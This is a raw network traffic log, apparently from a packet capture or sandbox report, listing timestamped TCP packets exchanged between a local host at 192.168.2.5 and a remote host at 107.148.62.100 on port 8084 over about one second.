Dec 18, 2024 13:32:06.536473036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.536484957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.536623955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.537658930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.537853003 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.537903070 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.538515091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.538527012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.538587093 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.657619953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.658102989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.658245087 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.658464909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.659034967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.659147978 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.778537989 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.778825998 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.778974056 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.779680967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.779968977 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.780035973 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.900136948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.900387049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.900446892 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.900775909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.900788069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.900835037 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.901753902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.902318954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.902332067 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.902365923 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.903484106 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.903527975 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.904043913 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.904057026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.904114962 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.905150890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.905164957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.905199051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.906287909 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.906300068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.906353951 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.907346964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.907358885 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.907391071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.908484936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.908498049 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.908536911 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.909768105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.909780979 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.909832001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.910907030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.910973072 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.911014080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.912106991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.912120104 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.912162066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.913363934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.913377047 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.913388014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.913414001 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.914760113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.914773941 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.914810896 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.915905952 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.915920019 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.915967941 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.917200089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.917212009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.917258024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.918728113 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.918742895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.918756008 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.918796062 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.918813944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.919859886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.919917107 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.919966936 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.920842886 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.920880079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.920938015 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.922069073 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.922106028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.922163963 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.923365116 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.923402071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.923461914 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.924577951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.924613953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.924648046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.924685955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.925944090 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.925980091 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.926012039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.927052021 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.927090883 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.927105904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.928339005 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.928375959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.928397894 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.929472923 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.929508924 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.929538965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.929543018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.929611921 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.930735111 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.930794954 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.930826902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.930851936 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.936639071 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.936722040 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.937074900 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.937586069 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.937660933 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.937917948 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.938590050 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.938649893 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.938918114 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.947243929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.947360039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.947510958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.947997093 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.948054075 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.950439930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.950731039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.950797081 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.951386929 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.954965115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.955038071 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.955105066 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.955502987 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.955555916 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.957674026 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.957933903 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.957992077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.958396912 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.959995985 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.960017920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.960072041 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.960333109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.960809946 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.960856915 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.961474895 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.961734056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.961791039 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.962387085 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.965601921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.965661049 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.965833902 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.966362953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.966406107 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.970762014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.971103907 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.971167088 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.971529961 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.972794056 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.972847939 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.973072052 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.973584890 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.973633051 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.977556944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.977890968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:06.977942944 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:06.978267908 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.035995960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.058929920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.059087038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.059148073 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.059518099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.059786081 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.059832096 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.060340881 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.061213017 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.061263084 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.063575029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.063613892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.063663960 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.064960957 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.065593958 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.065646887 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.065817118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.066134930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.066195965 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.067925930 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.068356991 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.068423986 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.068794012 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.070780993 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.070844889 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.071012020 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.072932959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.072985888 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.087336063 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.087698936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.087754011 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.088171959 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.139657974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.150481939 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.150803089 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.150872946 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.152671099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.153882027 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.153918028 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.153932095 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.155220985 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.155280113 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.164839029 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.165162086 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.165222883 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.165627956 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.165868044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.165916920 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.166548014 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.167198896 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.167253017 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.169425011 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.169661045 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.169724941 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.170084953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.171485901 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.171545029 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.171770096 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.172297955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.172352076 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.174071074 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.174312115 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.174365997 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.174990892 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.175913095 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.175966024 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.176232100 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.176542044 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.176599979 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.180098057 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.180612087 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.180668116 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.180972099 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.184914112 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.184964895 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.185235023 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.185700893 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.185771942 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.186701059 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.187099934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.187150002 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.187650919 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.191608906 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.191667080 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.191896915 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.192498922 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.192555904 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.560842037 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.560889006 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.561058044 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.562506914 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.562545061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.562581062 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.562602043 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.563922882 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.563985109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.564003944 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.565443039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.565479994 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.565494061 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.567075968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.567138910 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.568567038 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.568603039 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.568649054 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.568702936 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.570200920 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.570235968 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.570256948 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.570270061 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.570322990 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.571628094 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.571683884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.571738958 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.574697018 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.574713945 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.574728966 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.574769974 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.584733009 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.584749937 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.584759951 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.584810972 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.584845066 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.587815046 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.587827921 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.587837934 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.587896109 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.590934992 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.590948105 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.590958118 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.590997934 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.591026068 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.592542887 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.592556953 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.592566967 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.592603922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.595529079 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.595577955 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.595577955 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.595591068 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.595630884 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.597182035 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.597201109 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.597213030 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.597248077 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.598683119 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.598695040 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.598705053 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.598726988 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.598748922 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.600383043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.600394964 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.600404978 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.600452900 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.601958036 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.602001905 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.603532076 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.603543043 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.603555918 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.603586912 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.605067015 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.605079889 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.605118036 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.606668949 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.606681108 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.606690884 CET	8084	49705	107.148.62.100	192.168.2.5
Dec 18, 2024 13:32:07.606718063 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.606735945 CET	49705	8084	192.168.2.5	107.148.62.100
Dec 18, 2024 13:32:07.608021975 CET	8084	49705	107.148.62.100	192.168.2.5
